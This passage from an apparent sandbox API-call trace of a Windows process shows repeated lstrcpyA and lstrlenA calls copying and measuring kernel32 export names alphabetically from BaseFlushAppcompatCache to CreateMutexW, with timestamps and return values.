| out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.847] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.847] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.847] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.847] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.847] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.847] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.847] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.847] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.847] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.847] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.847] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.848] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.848] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.848] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.848] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.848] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.848] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.848] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.848] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.848] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.848] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.848] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.848] lstrlenA (lpString="BEEP") returned 4 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.848] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.848] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.848] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.848] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.848] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.848] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.848] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.849] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.849] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.849] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.849] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.849] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.849] lstrlenA (lpString="CANCELIO") returned 8 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.849] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.849] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.849] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.849] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.849] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.849] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.849] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.849] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.849] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.849] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.849] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.849] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.849] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.849] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.850] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.850] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.850] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.850] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.850] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.850] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.850] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.850] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.850] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.850] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.850] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.850] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.850] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.850] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.850] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.850] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.850] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.850] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.850] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.851] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.851] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.851] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.851] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.851] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.851] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.851] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.851] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.851] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.851] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.851] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.851] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.851] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.851] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.851] lstrlenA (lpString="COPYFILEA") returned 9 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.851] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.851] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.851] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.851] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.852] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.852] lstrlenA (lpString="COPYFILEW") returned 9 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.852] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.852] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.852] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.852] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.852] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.852] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.852] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.852] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.852] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.852] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.852] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.852] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.852] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.852] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.852] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.852] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.852] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.853] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.853] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.853] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.853] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.853] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.853] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.853] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.853] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.853] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.853] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.853] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.853] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.853] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.853] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.853] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.853] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.853] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.853] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.854] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.854] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.855] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.855] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.855] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.855] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.855] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.855] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.855] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.855] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.855] lstrcpyA (in: 